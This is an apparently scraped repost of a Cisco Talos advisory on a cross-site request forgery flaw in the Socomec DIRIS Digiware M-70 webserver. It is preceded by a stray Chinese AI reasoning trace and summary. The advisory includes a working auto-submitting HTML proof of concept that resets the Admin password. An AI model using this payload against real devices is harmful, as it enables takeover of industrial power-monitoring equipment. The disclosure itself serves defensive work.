嗯,用户让我总结一篇文章,控制在一百个字以内,而且不需要特定的开头。我先看看这篇文章的内容。 文章讲的是Socomec DIRIS Digiware M-70 1.6.9版本中的WEBVIEW-M功能存在CSRF漏洞。攻击者可以通过构造恶意HTTP请求,导致未经授权的访问。具体来说,攻击者可以创建一个恶意网页,当受害者访问时,会导致密码被篡改,从而获得管理员权限。 我需要把这些信息浓缩到一百字以内。首先确定关键点:设备型号、漏洞类型、攻击方式、影响。然后用简洁的语言表达出来。 可能的结构是:设备存在CSRF漏洞,攻击者利用恶意页面篡改密码,获取管理员权限。 检查一下字数是否符合要求,确保信息准确且不遗漏关键点。 </think> Socomec DIRIS Digiware M-70 1.6.9版本中的WEBVIEW-M功能存在CSRF漏洞。攻击者可通过构造恶意HTTP请求,在受害者登录状态下篡改管理员密码,获取管理员权限。 2025-12-1 00:0:31 Author: talosintelligence.com(查看原文) 阅读量:2 收藏
SUMMARY
A cross-site request forgery (csrf) vulnerability exists in the WEBVIEW-M functionality of Socomec DIRIS Digiware M-70 1.6.9. A specially crafted HTTP request can lead to unauthorized access. An attacker can stage a malicious webpage to trigger this vulnerability.
CONFIRMED VULNERABLE VERSIONS
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Socomec DIRIS Digiware M-70 1.6.9
PRODUCT URLS
DIRIS Digiware M-70 - https://www.socomec.us/en-us/reference/48290222
CVSSv3 SCORE
7.5 - CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE
CWE-352 - Cross-Site Request Forgery (CSRF)
DETAILS
The DIRIS Digiware M-50/M-70 gateway functions as the access point for industrial power monitoring systems, providing power supply and communication connection to devices in the electrical installation. It also includes a webserver WEBVIEW-M for the remote visualisation and analysis of measurements and consumption.
The Socomec M70 webserver, known as WEBVIEW-M utilizes cookies to manage user sessions. The session cookie has the SameSite attribute set to Strict which instructs the browser that it should not send the cookie in any cross-site requests. Often, this is a sufficient CSRF prevention measure. However, the WEBVIEW-M implementation does not properly handle the scenario where a request is submitted with no session cookie. If a victim visits a malicious web page while logged in to WEBVIEW-M, the browser will behave correctly in that it will not transmit the sessionid cookie due to the SameSite attribute being set to Strict. When this malicious request is received by the WEBVIEW-M webserver it will be processed as if it was authorized resulting in a successful Cross-site request forgery attack. When the browser sends the malicious request it will be sent within the existing TCP session that has been authenticated. Even though no valid sessionid cookie is included in the malicious request, it will be processed and executed by the WEBVIEW-M webserver.
<html>
<body>
<form id="csrf-form" action="http://192.168.0.4/Authenticate/?ModifyAccount" method="POST">
<input type="hidden" name="REQUEST_ID" value="1">
<input type="hidden" name = "DEVICE_ID" value="0">
<input type="hidden" name = "USERNAME" value="Admin">
<input type="hidden" name = "OLD_PASSWORD" value="">
<input type="hidden" name = "NEW_PASSWORD" value="CSRFAdmin1!">
<input type="submit" value="Submit">
</form>
<script>
// Automatically submit the form when the page loads
window.onload = function() {
document.getElementById('csrf-form').submit();
};
</script>
</body>
</html>
If the victim, logged in as the Cyber Security user of WEBVIEW-M visits the above HTML page from the same browser, the Admin user password will be changed to CSRFAdmin1! allowing the attacker to gain privileges of the Admin user.
VENDOR RESPONSE
Vendor advisory: https://www.socomec.fr/sites/default/files/2025-10/CVE-2024-53684—Diris-Digiware-Mxx-Dxx-_VULNERABILITIES_2025-10-01-16-43-14_English_0.pdf
TIMELINE
2025-01-13 - Vendor Disclosure
2025-10-01 - Vendor Patch Release
2025-12-01 - Public Release
Discovered by Kelly Patterson of Cisco Talos.
如有侵权请联系:admin#unsafe.sh